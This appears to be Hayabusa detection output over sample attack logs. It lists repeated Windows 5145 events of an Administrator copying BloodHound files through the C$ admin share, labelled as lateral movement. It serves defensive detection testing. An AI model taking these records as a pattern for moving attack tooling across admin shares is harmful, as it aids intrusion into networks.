0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
